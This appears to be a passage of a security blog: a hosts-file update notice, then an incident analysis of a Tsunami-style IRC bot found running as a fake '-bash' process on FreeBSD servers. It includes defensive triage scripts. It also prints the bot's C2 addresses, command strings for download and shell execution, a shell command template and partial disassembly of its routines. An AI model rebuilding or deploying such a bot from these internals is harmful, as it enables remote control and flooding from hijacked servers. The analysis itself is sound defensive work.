Friday, 31 May 2013

The hpHOSTS Hosts file has been updated. There is now a total of 193,822 listed hostnames.
If you are NOT using the installer, please read the included Readme.txt file for installation instructions. Enjoy! :)
Latest Updated: 01/06/2013 03:00
Last Verified: 01/06/2013 00:00
Download hpHosts now! http://hosts-file.net/?s=Download

Thursday, 30 May 2013

*) I dedicate this writing to fellow UNIX admins who put in countless hours of hard effort to keep our internet services up and running. #RESPECT!
Snapshot:

Summary

Sadly, a strong wave of malware attacks on UNIX systems started early this year. We still remember the rush from the Darkleech rogue Apache module, then the Linux/cDorked rogue httpd, and on to rogue web server binaries built for other popular web servers like nginx and others.

Today I was asked to help fellow unixmen who maintain services on a generic xBSD; they had detected strange IRC port access from several online machines. I was not expecting to see new cDorked or Darkleech samples, or a common Linux threat, on this one (as a FreeBSD user and fan I know how good its security is), but I guess I was wrong.

This case is actually the same old story: the system appears to have been exploited through a web admin panel abused over HTTP (sorry, I can't say which panel right now) using a tool that fires rapid fetch/wget requests (later on we learned that the malware discussed here has that function too). Root privilege was gained via a crontab entry running as UID 0 (root, indeed), and from that hole the whole server's security was compromised. The bad guys then compiled a nasty downloader/IRC bot backdoor (previously known as TSUNAMI), deleted all related source traces and logs, and ran and hid the service behind a fake "-bash" process (ever seen a BSD system with a bash login shell process before? *smile*).

First Handle Analysis

I think it is important to share what to do at a time like this, so I dared myself to write it up, hoping not to step on anyone's toes. The rule is simple: if they took root, we take the service offline, no matter what.
OK, in short: I went onto the system and found the strange "-bash" process running:

USER    PID  %CPU %MEM    VSZ    RSS  TT  STAT STARTED    TIME COMMAND
root 96606 0.0 0.2 95939 1096 ?? Ss 28Feb13 0:19.87 -bash
I quickly checked the outbound connections (netstat) and found that IRC ports were being connected to:
Active Internet connections
Proto Recv-Q Send-Q Local Address Foreign Address (state)
----------------------------------------------------------------------------
// for IRC....

tcp4 0 0 x.x.x.x.59314 188.190.124.81.ircd SYN_SENT
tcp4 0 0 x.x.x.x.60606 188.190.124.81.ircd SYN_SENT
tcp4 0 0 x.x.x.x.46914 188.190.124.81.ircd SYN_SENT
tcp4 0 0 x.x.x.x.53001 188.190.124.81.ircd SYN_SENT
tcp4 0 0 x.x.x.x.50123 188.190.124.81.ircd SYN_SENT
tcp4 0 0 x.x.x.x.36833 188.190.124.81.ircd SYN_SENT
[...]
And all of a sudden, FTP connection attempts kept showing up as well:
Active Internet connections
Proto Recv-Q Send-Q Local Address Foreign Address (state)
----------------------------------------------------------------------------
// for FTP....
tcp4 0 0 x.x.x.x.64873 wf.networksoluti.ftp SYN_SENT
tcp4 0 0 x.x.x.x.64873 wf.networksoluti.ftp SYN_SENT
[...]
Just to be sure, I fired lsof on another compromised machine to confirm, and found the same condition:
-bash 95939  root  cwd     VDIR       0,99       1024  869616 /{Directory of the malware}
-bash 95939 root rtd VDIR 0,99 1024 2 /
-bash 95939 root txt VREG 0,99 18902 870081 {Directory of the malware}/-bash
-bash 95939 root txt VREG 0,99 229192 94984 /libexec/ld-elf.so.1
-bash 95939 root txt VREG 0,99 1172708 615898 /lib/libc.so.7
-bash 95939 root 0u VCHR 0,105 0t31989 105 /dev/pts/0
-bash 95939 root 1u VCHR 0,105 0t31989 105 /dev/pts/0
-bash 95939 root 2u VCHR 0,105 0t31989 105 /dev/pts/0
-bash 95939 root 3u VREG 0,99 0 539122 "/tmp/tan.pid"
-bash 95939 root 4u IPv4 0xc38b4560 0t0 "TCP x.x.x.x:65114->188.190.124.81:ircd (SYN_SENT)"
[...]
This can never be good, since all of those connection attempts come from the PID of that "-bash". So I followed procedure, took the machine offline and continued the analysis.
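The two checks above (a "shell" whose executable does not live where shells live, and a stream of half-open connections to IRC ports) are easy to automate for the next box. The script below is an added example, not a tool from the original post: it parses lsof and netstat output in the same column layout shown above, flags a process whose command name is a shell but whose txt mapping is outside the shell directories or is a file literally named "-bash", and counts SYN_SENT attempts per foreign host on IRC ports. The sample lines are constructed to mirror the post's output; the path /var/tmp/.x and the addresses 10.0.0.5 and 203.0.113.7 are made up.

```python
"""First-handle triage for the symptoms described above: a process that
claims to be a login shell ("-bash") but whose executable lives outside
the shell directories, and a burst of half-open (SYN_SENT) connections to
IRC ports.  Added example, not a tool from the original post.  The
lsof/netstat lines are constructed; /var/tmp/.x, 10.0.0.5 and 203.0.113.7
are made up."""
import os
import sys
from collections import Counter

# Directories where a genuine shell binary may live on FreeBSD or Linux.
LEGIT_SHELL_DIRS = ("/bin", "/usr/bin", "/usr/local/bin", "/rescue")
SHELL_NAMES = {"bash", "sh", "csh", "tcsh", "zsh", "ksh"}
# IRC service names/ports as netstat prints them, resolved or numeric.
IRC_PORTS = {"ircd", "irc", "6666", "6667", "6668", "6669", "7000"}

# Constructed `lsof -p <pid>` lines in FreeBSD's column layout:
# COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
LSOF_SAMPLE = """\
-bash 95939 root cwd VDIR 0,99 1024 869616 /var/tmp/.x
-bash 95939 root txt VREG 0,99 18902 870081 /var/tmp/.x/-bash
-bash 95939 root txt VREG 0,99 229192 94984 /libexec/ld-elf.so.1
-bash 95939 root 3u VREG 0,99 0 539122 /tmp/tan.pid
-bash 95939 root 4u IPv4 0xc38b4560 0t0 TCP 10.0.0.5:65114->188.190.124.81:ircd (SYN_SENT)
bash 1201 alice txt VREG 0,99 750000 12345 /usr/local/bin/bash
"""

# Constructed `netstat -an`-style lines; FreeBSD joins address and port with '.'.
NETSTAT_SAMPLE = """\
tcp4 0 0 10.0.0.5.59314 188.190.124.81.ircd SYN_SENT
tcp4 0 0 10.0.0.5.60606 188.190.124.81.ircd SYN_SENT
tcp4 0 0 10.0.0.5.46914 188.190.124.81.6667 SYN_SENT
tcp4 0 0 10.0.0.5.22 203.0.113.7.51822 ESTABLISHED
tcp4 0 0 10.0.0.5.64873 205.178.189.131.ftp SYN_SENT
"""


def shell_impostors(lsof_text):
    """Return [(pid, path)] for processes whose command name is a shell but
    whose mapped executable ('txt' entry) is outside the shell directories
    or is literally named with a leading '-', like the "-bash" file above."""
    hits = []
    for line in lsof_text.splitlines():
        parts = line.split(None, 8)
        if len(parts) < 9 or parts[3] != "txt":
            continue
        cmd, pid, path = parts[0].lstrip("-"), int(parts[1]), parts[8]
        if cmd not in SHELL_NAMES:
            continue
        base = os.path.basename(path)
        if base.lstrip("-") not in SHELL_NAMES:
            continue  # a mapped shared library, not the executable itself
        if base.startswith("-") or os.path.dirname(path) not in LEGIT_SHELL_DIRS:
            hits.append((pid, path))
    return hits


def irc_syn_sent(netstat_text):
    """Count SYN_SENT attempts per foreign host on IRC ports; a bot whose
    C2 is down shows up as a steady stream of these."""
    counts = Counter()
    for line in netstat_text.splitlines():
        f = line.split()
        if len(f) < 6 or not f[0].startswith("tcp") or f[5] != "SYN_SENT":
            continue
        sep = ":" if ":" in f[4] else "."  # Linux host:port vs FreeBSD host.port
        host, _, port = f[4].rpartition(sep)
        if port in IRC_PORTS:
            counts[host] += 1
    return counts


if __name__ == "__main__":
    # Real use:  lsof -p <pid> | python3 triage.py lsof
    #       or:  netstat -an | python3 triage.py netstat
    if len(sys.argv) > 1 and sys.argv[1] == "lsof":
        print(shell_impostors(sys.stdin.read()))
    elif len(sys.argv) > 1 and sys.argv[1] == "netstat":
        print(dict(irc_syn_sent(sys.stdin.read())))
    else:
        print("shell impostors:", shell_impostors(LSOF_SAMPLE))
        print("IRC SYN_SENT per host:", dict(irc_syn_sent(NETSTAT_SAMPLE)))
```

This is a first-pass filter only: a bot dropped as a copy named /usr/local/bin/bash would pass the path check, so still compare the inode and hash of the txt file against the installed package. On FreeBSD, `procstat -b <pid>` gives the executable path without lsof.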

This is the binary responsible for the disaster, saved in $TMP:

$ ls -alF
-rwxr-xr-x 1 xxx xxx 18902 May 02 15:11 -bash*
Comparing the process start time with the file timestamp will lead you to /dev/null (both are trivially forged), so ignore those and stick to whatever logs and dumps might still hold traces (if we are lucky).
On most machines we found no trace of how this binary got there, but one machine with snapshots had left a compile trail in the logs on its mirror backup storage:
k.c:91: warning: conflicting types for built-in function 'pow'
k.c:586:2: warning: no newline at end of file
Aha, it seems someone compiled this on the box; you can see the source was in C (k.c).
(I sought the source everywhere but couldn't find it; it must have been deleted.)

At that point I had no other option but to tear it apart. So here we go:

Binary Analysis

Binary structure: it is an ELF:

file format elf32-i386
architecture: i386, flags 0x00000112:
EXEC_P, HAS_SYMS, D_PAGED
start address 0x08048d20
The ELF header:
ELF Header:
Magic: 7f 45 4c 46 01 01 01 09 00 00 00 00 00 00 00 00
Class: ELF32
Data: 2's complement, little endian
Version: 1 (current)
OS/ABI: UNIX - FreeBSD
ABI Version: 0
Type: EXEC (Executable file)
Machine: Intel 80386
Version: 0x1
Entry point address: 0x8048d20
Start of program headers: 52 (bytes into file)
Start of section headers: 13864 (bytes into file)
Flags: 0x0
Size of this header: 52 (bytes)
Size of program headers: 32 (bytes)
Number of program headers: 8
Size of section headers: 40 (bytes)
Number of section headers: 28
Section header string table index: 25
Hex:
0000   7F 45 4C 46 01 01 01 09 00 00 00 00 00 00 00 00    .ELF............
0010 02 00 03 00 01 00 00 00 20 8D 04 08 34 00 00 00 ........ ...4...
0020 28 36 00 00 00 00 00 00 34 00 20 00 08 00 28 00 (6......4. ...(.
0030 1C 00 19 00 06 00 00 00 34 00 00 00 34 80 04 08 ........4...4...
0040 34 80 04 08 00 01 00 00 00 01 00 00 05 00 00 00 4...............
0050 04 00 00 00 03 00 00 00 34 01 00 00 34 81 04 08 ........4...4...
0060 34 81 04 08 15 00 00 00 15 00 00 00 04 00 00 00 4...............
0070 01 00 00 00 01 00 00 00 00 00 00 00 00 80 04 08 ................
0080 00 80 04 08 94 30 00 00 94 30 00 00 05 00 00 00 .....0...0......
0090 00 10 00 00 01 00 00 00 94 30 00 00 94 C0 04 08 .........0......
00A0 94 C0 04 08 6C 02 00 00 10 09 00 00 06 00 00 00 ....l...........
00B0 00 10 00 00 02 00 00 00 A8 30 00 00 A8 C0 04 08 .........0......
00C0 A8 C0 04 08 C8 00 00 00 C8 00 00 00 06 00 00 00 ................
00D0 04 00 00 00 04 00 00 00 4C 01 00 00 4C 81 04 08 ........L...L...
00E0 4C 81 04 08 18 00 00 00 18 00 00 00 04 00 00 00 L...............
00F0 04 00 00 00 50 E5 74 64 48 30 00 00 48 B0 04 08 ....P.tdH0..H...
0100 48 B0 04 08 14 00 00 00 14 00 00 00 04 00 00 00 H...............
0110 04 00 00 00 51 E5 74 64 00 00 00 00 00 00 00 00 ....Q.td........
0120 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 ................
0130 04 00 00 00 2F 6C 69 62 65 78 65 63 2F 6C 64 2D ..../libexec/ld-
0140 65 6C 66 2E 73 6F 2E 31 00 00 00 00 08 00 00 00 elf.so.1........
The ELF header says OS/ABI "UNIX - FreeBSD" and the interpreter is /libexec/ld-elf.so.1, so this is a native FreeBSD build from source, not a Linux binary running under the Linux compatibility layer. I'd say the attackers were not preparing to target FreeBSD specifically: the bot's source is portable C, so they simply compiled it on whatever box they got into, and got lucky with hosts that had a working compiler.
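The OS/ABI byte and the PT_INTERP string are the two fields that settle the "native or compat" question, and both sit inside the 0x150 bytes dumped above. The script below is an added example, not part of the original post: it unpacks the ELF32 header and program headers from exactly those bytes, pulls the loader path out of the PT_INTERP segment and reports segment permissions, so the verdict does not depend on trusting `file` on a possibly tampered host. HEX is the dump as printed above; nothing else is assumed.

```python
"""Parse the ELF32 header, program headers and PT_INTERP string from the
hex dump printed above.  Added example, not from the original post; HEX is
the first 0x150 bytes of the "-bash" sample exactly as the post prints them."""
import struct

OSABI_NAMES = {0: "UNIX - System V", 3: "Linux", 6: "Solaris", 9: "FreeBSD",
               12: "OpenBSD"}
PT_NAMES = {1: "LOAD", 2: "DYNAMIC", 3: "INTERP", 4: "NOTE", 6: "PHDR",
            0x6474E550: "GNU_EH_FRAME", 0x6474E551: "GNU_STACK"}

HEX = """
7F 45 4C 46 01 01 01 09 00 00 00 00 00 00 00 00
02 00 03 00 01 00 00 00 20 8D 04 08 34 00 00 00
28 36 00 00 00 00 00 00 34 00 20 00 08 00 28 00
1C 00 19 00 06 00 00 00 34 00 00 00 34 80 04 08
34 80 04 08 00 01 00 00 00 01 00 00 05 00 00 00
04 00 00 00 03 00 00 00 34 01 00 00 34 81 04 08
34 81 04 08 15 00 00 00 15 00 00 00 04 00 00 00
01 00 00 00 01 00 00 00 00 00 00 00 00 80 04 08
00 80 04 08 94 30 00 00 94 30 00 00 05 00 00 00
00 10 00 00 01 00 00 00 94 30 00 00 94 C0 04 08
94 C0 04 08 6C 02 00 00 10 09 00 00 06 00 00 00
00 10 00 00 02 00 00 00 A8 30 00 00 A8 C0 04 08
A8 C0 04 08 C8 00 00 00 C8 00 00 00 06 00 00 00
04 00 00 00 04 00 00 00 4C 01 00 00 4C 81 04 08
4C 81 04 08 18 00 00 00 18 00 00 00 04 00 00 00
04 00 00 00 50 E5 74 64 48 30 00 00 48 B0 04 08
48 B0 04 08 14 00 00 00 14 00 00 00 04 00 00 00
04 00 00 00 51 E5 74 64 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00
04 00 00 00 2F 6C 69 62 65 78 65 63 2F 6C 64 2D
65 6C 66 2E 73 6F 2E 31 00 00 00 00 08 00 00 00
"""


def _perm(flags):
    """Render p_flags (PF_R=4, PF_W=2, PF_X=1) as an rwx string."""
    return (("R" if flags & 4 else "-") + ("W" if flags & 2 else "-")
            + ("X" if flags & 1 else "-"))


def parse_elf32(data):
    """Unpack the ELF32 little-endian header and program headers."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF image")
    if data[4] != 1 or data[5] != 1:
        raise ValueError("only ELF32 little-endian is handled here")
    osabi = data[7]
    (e_type, e_machine, _ver, e_entry, e_phoff, e_shoff, _flags, _ehsize,
     e_phentsize, e_phnum, _shentsize, e_shnum,
     e_shstrndx) = struct.unpack_from("<HHIIIIIHHHHHH", data, 16)
    phdrs = []
    for i in range(e_phnum):
        (p_type, p_off, p_vaddr, _paddr, p_filesz, p_memsz, p_flags,
         p_align) = struct.unpack_from("<8I", data, e_phoff + i * e_phentsize)
        phdrs.append({"name": PT_NAMES.get(p_type, hex(p_type)), "type": p_type,
                      "offset": p_off, "vaddr": p_vaddr, "filesz": p_filesz,
                      "memsz": p_memsz, "perm": _perm(p_flags), "align": p_align})
    interp = None
    for ph in phdrs:
        if ph["type"] == 3:  # PT_INTERP: NUL-terminated loader path
            raw = data[ph["offset"]:ph["offset"] + ph["filesz"]]
            interp = raw.split(b"\0", 1)[0].decode("ascii")
    return {"type": e_type, "machine": e_machine, "osabi": osabi,
            "osabi_name": OSABI_NAMES.get(osabi, "unknown"), "entry": e_entry,
            "phoff": e_phoff, "shoff": e_shoff, "phnum": e_phnum,
            "shnum": e_shnum, "shstrndx": e_shstrndx, "phdrs": phdrs,
            "interp": interp}


def native_freebsd(info):
    """True when both the ABI byte and the loader path say FreeBSD.  A Linux
    ELF run under the Linuxulator carries OS/ABI 0 or 3 and /lib/ld-linux.so.*."""
    return info["osabi"] == 9 and (info["interp"] or "").startswith("/libexec/ld-elf.so")


if __name__ == "__main__":
    info = parse_elf32(bytes.fromhex(HEX))
    print("OS/ABI:", info["osabi"], info["osabi_name"], "interp:", info["interp"])
    print("entry 0x%x  phoff %d  shoff %d  shnum %d" % (
        info["entry"], info["phoff"], info["shoff"], info["shnum"]))
    for ph in info["phdrs"]:
        print("  %-12s off=0x%05x vaddr=0x%08x filesz=0x%05x memsz=0x%05x %s" % (
            ph["name"], ph["offset"], ph["vaddr"], ph["filesz"], ph["memsz"], ph["perm"]))
    print("native FreeBSD build:", native_freebsd(info))
```

Two details worth reading off the output: the GNU_STACK segment has flags 6 (RW-), so the stack is non-executable, and the second PT_LOAD's memsz (0x910) is larger than its filesz (0x26c), which is the .bss the bot uses for its global buffers.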

Dynamic Section:

(Why do I always look at this section? Because the shared libraries and functions the dynamic linker needs are listed here.)
NEEDED libc.so.7
INIT 0x8048a00
FINI 0x804a97c
HASH 0x8048164
STRTAB 0x804864c
SYMTAB 0x80482dc
STRSZ 0x196
SYMENT 0x10
DEBUG 0x0
PLTGOT 0x804c170
PLTRELSZ 0x178
PLTREL 0x11
JMPREL 0x8048888
REL 0x8048870
RELSZ 0x18
RELENT 0x8
VERNEED 0x8048850
VERNEEDNUM 0x1
VERSYM 0x80487e2
[...]
Let's check the sections:
Section Headers:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
[ 0] NULL 00000000 000000 000000 00 0 0 0
[ 1] .interp PROGBITS 08048134 000134 000015 00 A 0 0 1
[ 2] .note.ABI-tag NOTE 0804814c 00014c 000018 00 A 0 0 4
[ 3] .hash HASH 08048164 000164 000178 04 A 4 0 4
[ 4] .dynsym DYNSYM 080482dc 0002dc 000370 10 A 5 1 4
[ 5] .dynstr STRTAB 0804864c 00064c 000196 00 A 0 0 1
[ 6] .gnu.version VERSYM 080487e2 0007e2 00006e 02 A 4 0 2
[ 7] .gnu.version_r VERNEED 08048850 000850 000020 00 A 5 1 4
[ 8] .rel.dyn REL 08048870 000870 000018 08 A 4 0 4
[ 9] .rel.plt REL 08048888 000888 000178 08 A 4 11 4
[10] .init PROGBITS 08048a00 000a00 000011 00 AX 0 0 4
[11] .plt PROGBITS 08048a14 000a14 000300 04 AX 0 0 4
[12] .text PROGBITS 08048d20 000d20 001c5c 00 AX 0 0 16
[13] .fini PROGBITS 0804a97c 00297c 00000c 00 AX 0 0 4
[14] .rodata PROGBITS 0804a988 002988 0006bf 00 A 0 0 4
[15] .eh_frame_hdr PROGBITS 0804b048 003048 000014 00 A 0 0 4
[16] .eh_frame PROGBITS 0804b05c 00305c 000038 00 A 0 0 4
[17] .ctors PROGBITS 0804c094 003094 000008 00 WA 0 0 4
[18] .dtors PROGBITS 0804c09c 00309c 000008 00 WA 0 0 4
[19] .jcr PROGBITS 0804c0a4 0030a4 000004 00 WA 0 0 4
[20] .dynamic DYNAMIC 0804c0a8 0030a8 0000c8 08 WA 5 0 4
[21] .got.plt PROGBITS 0804c170 003170 0000c8 04 WA 0 0 4
[22] .data PROGBITS 0804c240 003240 0000c0 00 WA 0 0 32
[23] .bss NOBITS 0804c300 003300 0006a4 00 WA 0 0 32
[24] .comment PROGBITS 00000000 003300 000248 00 0 0 1
[25] .shstrtab STRTAB 00000000 003548 0000e0 00 0 0 1
[26] .symtab SYMTAB 00000000 003a88 000950 10 27 48 4
[27] .strtab STRTAB 00000000 0043d8 0005fe 00 0 0 1
Tip for an unknown system: check the .comment section to confirm the binary was compiled in the victim's environment (here the crt1 stub comes from FreeBSD releng/9.0; I did this for every infected machine's sample):
// Contents of section .comment:
0000 00244672 65654253 443a2072 656c656e .$FreeBSD: relen
0010 672f392e 302f6c69 622f6373 752f6933 g/9.0/lib/csu/i3
0020 38362d65 6c662f63 7274315f 732e5320 86-elf/crt1_s.S
0030 32313733 38332032 3031312d 30312d31 217383 2011-01-1
0040 33203233 3a30303a 32325a20 6b696220 3 23:00:22Z kib
0050 24000024 46726565 4253443a 2072656c $..$FreeBSD: rel
By firing rabin I got the import symbols:
[Imports]
48 imports /* <======== noted */
_Jv_RegisterClasses
__error
__inet_addr
_init_tls
atexit
bcopy
close
[...]
And these are the imported functions behind the malicious activity (networking, process control, shell execution, file locking):
gethostbyname
connect
sleep
setsockopt
fopen
vsprintf
time
__isthreaded
strtok
write
environ
flock
socket
fork
free
srand
popen
strdup
strcpy
[...]
Some traces of HTTP connectivity:
http://
cvv4you.ru // hosts...
188.190.124.120
GET /%s HTTP/1.0
Connection: Keep-Alive
User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686)
Host: %s:80
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
Accept-Encoding: gzip
Accept-Language: en
Accept-Charset: iso-8859-1,*,utf-8
IRC Messages:
PRIVMSG %s :GET  
PRIVMSG %s :Unable to create socket.
PRIVMSG %s :Unable to resolve address.
PRIVMSG %s :Unable to connect to http.
IRC Commands:
PRIVMSG %s :Receiving file.
PRIVMSG %s :Saved as %s
PRIVMSG %s :NICK <nick>
PRIVMSG %s :Nick cannot be larger than 9 characters.
NICK %s
PRIVMSG %s :Unable to resolve %s
PRIVMSG %s :MOVE <server>
NOTICE %s :NICK <nick> = Changes the nick of the client
NOTICE %s :SERVER <server> = Changes servers
NOTICE %s :KILL = Kills the client
NOTICE %s :GET <http address> <save as> = Downloads a file off the web and saves it onto the hd
NOTICE %s :HELP = Displays this
NOTICE %s :IRC <command> = send_msgs this command to the server
NOTICE %s :SH <command> = Executes a command
NICK
SERVER
KILL
HELP
IRC
PRIVMSG %s :%s
MODE %s -ix
NICK %s
JOIN %s :%s
WHO %s
PONG %s
PRIVMSG %s :I'm having a problem resolving my host, someone will have to SPOOFS me manually.
PRIVMSG
PING
Traces of read/write string handling in C/Unix:
fputc
fgets
At this point I also saw the PID/lockfile control traces:
// PID hooks:
waitpid
/tmp/tan.pid
Lockfile found. Exiting.
-bash // the malware's process name..
I confirmed to the admins that the infected xBSD systems weren't affected by this part, but on Linux the shell command template below (the SH command, handed to a shell via popen()) will bring exactly the chaos you'd expect:
export PATH=/bin:/sbin:/usr/bin:/usr/local/bin:/usr/sbin;%s
Caveat: `export` is a POSIX sh builtin and FreeBSD's /bin/sh accepts it too, so don't count on BSD being immune to that command on its own. The functions below certainly do work on both:
gethostbyname
kill
environ

A quick Reversing

Practically, if you go through the steps above you can already write a very good report about this incident; it was just my curiosity that made me reverse it to find the important functions below:

Messaging..

// ref: unix socket programming
// send_msg: vsprintf() of the caller's format string into a fixed global buffer (0x804c340), then write() it to the socket
# 08048fc0 <send_msg>:
08048fc0: push %ebp
08048fc1: mov %esp,%ebp
08048fc3: sub $0x28,%esp
08048fc6: lea 0x10(%ebp),%eax
08048fc9: mov %eax,-0x4(%ebp)
08048fcc: mov -0x4(%ebp),%eax
08048fcf: mov %eax,0x8(%esp)
08048fd3: mov 0xc(%ebp),%eax
08048fd6: mov %eax,0x4(%esp)
08048fda: movl $0x804c340,(%esp)
08048fe1: call 0x08048c74 <vsprintf@plt>
08048fe6: movl $0x804c340,(%esp)
08048fed: call 0x08048b84 <strlen@plt>
08048ff2: mov %eax,0x8(%esp)
08048ff6: movl $0x804c340,0x4(%esp)
08048ffe: mov 0x8(%ebp),%eax
08049001: mov %eax,(%esp)
08049004: call 0x08048cf4 <write@plt>
08049009: leave
0804900a: ret
0804900b: nop
A self-lookup (resolve a name to an IP: inet_addr() first, then gethostbyname(); on failure it reports over IRC and exits):
# 08049730 <host2ip>:
08049730: push %ebp
08049731: mov %esp,%ebp
08049733: sub $0x28,%esp
08049736: mov 0xc(%ebp),%eax
08049739: mov %eax,(%esp)
0804973c: call 0x08048a94 <__inet_addr@plt>
08049741: mov %eax,0x804c740
08049746: mov 0x804c740,%eax
0804974b: cmp $0xffffffff,%eax
0804974e: jne 0x080497b7 <host2ip+0x87>
08049750: mov 0xc(%ebp),%eax
08049753: mov %eax,(%esp)
08049756: call 0x08048c14 <gethostbyname@plt>
0804975b: mov %eax,-0x4(%ebp)
0804975e: cmpl $0x0,-0x4(%ebp)
08049762: jne 0x08049793 <host2ip+0x63>
08049764: mov 0x804c760,%eax
08049769: mov 0xc(%ebp),%edx
0804976c: mov %edx,0xc(%esp)
08049770: mov 0x8(%ebp),%edx
08049773: mov %edx,0x8(%esp)
08049777: movl $0x804abf8,0x4(%esp)
0804977f: mov %eax,(%esp)
08049782: call 0x08048fc0 <send_msg>
08049787: movl $0x0,(%esp)
0804978e: call 0x08048cb4 <exit@plt>
08049793: mov -0x4(%ebp),%eax
08049796: mov 0xc(%eax),%eax
08049799: mov %eax,%edx
0804979b: mov -0x4(%ebp),%eax
0804979e: mov 0x10(%eax),%eax
080497a1: mov (%eax),%eax
080497a3: mov %edx,0x8(%esp)
080497a7: movl $0x804c740,0x4(%esp)
080497af: mov %eax,(%esp)
080497b2: call 0x08048c44 <bcopy@plt>
080497b7: mov 0x804c740,%eax
080497bc: leave
080497bd: ret
080497be: xchg %ax,%ax
This is how it grabs stuff from the "mother" remote host (the GET command: forks, then opens a TCP socket):
# 080492a0 <get>:
080492a0: push %ebp
080492a1: mov %esp,%ebp
080492a3: push %ebx
080492a4: sub $0x1454,%esp
080492aa: mov 0xc(%ebp),%eax
080492ad: mov %eax,(%esp)
080492b0: call 0x08049010 <mfork>
080492b5: test %eax,%eax
080492b7: jne 0x0804969e <get+0x3fe>
080492bd: cmpl $0x1,0x10(%ebp)
080492c1: jg 0x080492e9 <get+0x49>
080492c3: mov 0xc(%ebp),%eax
080492c6: mov %eax,0x8(%esp)
080492ca: movl $0x804a9a8,0x4(%esp)
080492d2: mov 0x8(%ebp),%eax
080492d5: mov %eax,(%esp)
080492d8: call 0x08048fc0 <send_msg>
080492dd: movl $0x0,(%esp)
080492e4: call 0x08048cb4 <exit@plt>
080492e9: movl $0x0,0x8(%esp)
080492f1: movl $0x1,0x4(%esp)
080492f9: movl $0x2,(%esp)
08049300: call 0x08048ae4 <socket@plt>
08049305: mov %eax,-0x28(%ebp)
08049308: cmpl $0xffffffff,-0x28(%ebp)
0804930c: jne 0x08049334 <get+0x94>
[...]
A checksum routine: the classic Internet one's-complement sum over 16-bit words (with the odd trailing byte handled), which is what you need when hand-building raw packets for flooding:
# 08049210 <in_cksum>:
08049210: push %ebp
08049211: mov %esp,%ebp
08049213: sub $0x1c,%esp
08049216: mov 0xc(%ebp),%eax
08049219: mov %eax,-0x1c(%ebp)
0804921c: mov 0x8(%ebp),%edx
0804921f: mov %edx,-0x18(%ebp)
08049222: movl $0x0,-0x14(%ebp)
08049229: movw $0x0,-0x2(%ebp)
0804922f: jmp 0x08049245 <in_cksum+0x35>
08049231: mov -0x18(%ebp),%edx
08049234: movzwl (%edx),%eax
08049237: movzwl %ax,%eax
0804923a: add %eax,-0x14(%ebp)
0804923d: addl $0x2,-0x18(%ebp)
08049241: subl $0x2,-0x1c(%ebp)
08049245: cmpl $0x1,-0x1c(%ebp)
08049249: jg 0x08049231 <in_cksum+0x21>
0804924b: cmpl $0x1,-0x1c(%ebp)
0804924f: jne 0x08049266 <in_cksum+0x56>
08049251: lea -0x2(%ebp),%edx
08049254: mov -0x18(%ebp),%eax
[...]
Move to another IRC server (the MOVE/SERVER command): strdup() the new server name into a global, set the "change server" flag, and close the current socket:
# 080497c0 <move>:
080497c0: push %ebp
080497c1: mov %esp,%ebp
080497c3: sub $0x18,%esp
080497c6: cmpl $0x0,0x10(%ebp)
080497ca: jg 0x080497f2 <move+0x32>
080497cc: mov 0xc(%ebp),%eax
080497cf: mov %eax,0x8(%esp)
080497d3: movl $0x804ac1a,0x4(%esp)
080497db: mov 0x8(%ebp),%eax
080497de: mov %eax,(%esp)
080497e1: call 0x08048fc0 <send_msg>
080497e6: movl $0x1,(%esp)
080497ed: call 0x08048cb4 <exit@plt>
080497f2: mov 0x14(%ebp),%eax
080497f5: add $0x4,%eax
080497f8: mov (%eax),%eax
080497fa: mov %eax,(%esp)
080497fd: call 0x08048b34 <strdup@plt>
08049802: mov %eax,0x804c888
08049807: movl $0x1,0x804c320
08049811: mov 0x8(%ebp),%eax
08049814: mov %eax,(%esp)
08049817: call 0x08048b54 <close@plt>
0804981c: leave
0804981d: ret
0804981e: xchg %ax,%ax
Termination of its own processes (the KILL command; note kill(0, SIGKILL), which takes down the whole process group):
# 08049820 <killd>:
08049820: push %ebp
08049821: mov %esp,%ebp
08049823: sub $0x8,%esp
08049826: movl $0x9,0x4(%esp)
0804982e: movl $0x0,(%esp)
08049835: call 0x08048cc4 <kill@plt>
0804983a: leave
0804983b: ret
0804983c: lea 0x0(%esi),%esi
The functions below relate to the (strongly suspected) flood operation:
# 08049010 <mfork>:
08049010: push %ebp
08049011: mov %esp,%ebp
08049013: sub $0x18,%esp
08049016: call 0x08048a84 <fork@plt>
0804901b: mov %eax,-0xc(%ebp)
0804901e: cmpl $0x0,-0xc(%ebp)
08049022: jne 0x0804902f <mfork+0x1f>
08049024: mov -0xc(%ebp),%eax
08049027: mov %eax,-0x14(%ebp)
0804902a: jmp 0x080490bb <mfork+0xab>
[...]

# 08049120 <makestring>:
08049120: push %ebp
08049121: mov %esp,%ebp
08049123: push %esi
08049124: push %ebx
08049125: sub $0x30,%esp
08049128: movl $0x9,-0x10(%ebp)
0804912f: mov -0x10(%ebp),%eax
08049132: add $0x1,%eax
08049135: mov %eax,(%esp)
08049138: call 0x08048a24 <malloc@plt>
0804913d: mov %eax,-0x14(%ebp)
08049140: mov -0x10(%ebp),%eax
08049143: add $0x1,%eax
08049146: mov %eax,0x8(%esp)
0804914a: movl $0x0,0x4(%esp)
08049152: mov -0x14(%ebp),%eax
08049155: mov %eax,(%esp)
08049158: call 0x08048c94 <memset@plt>
0804915d: movl $0x0,-0xc(%ebp)
08049164: jmp 0x080491a8 <makestring+0x88>
08049166: mov -0xc(%ebp),%eax
[...]

# 080491c0 <pow>: // we saw the compilation warning on this one.. :-)
080491c0: push %ebp
080491c1: mov %esp,%ebp
080491c3: sub $0xc,%esp
080491c6: cmpl $0x0,0xc(%ebp)
080491ca: jne 0x080491d5 <pow+0x15>
080491cc: movl $0x1,-0x4(%ebp)
080491d3: jmp 0x08049201 <pow+0x41>
080491d5: cmpl $0x1,0xc(%ebp)
080491d9: jne 0x080491e3 <pow+0x23>
080491db: mov 0x8(%ebp),%eax
080491de: mov %eax,-0x4(%ebp)
080491e1: jmp 0x08049201 <pow+0x41>
080491e3: mov 0xc(%ebp),%eax
080491e6: sub $0x1,%eax
[...]
And there are so many more...
** For a complete reverse note you'll find it here-->>[Pastebin] **

What does it do?
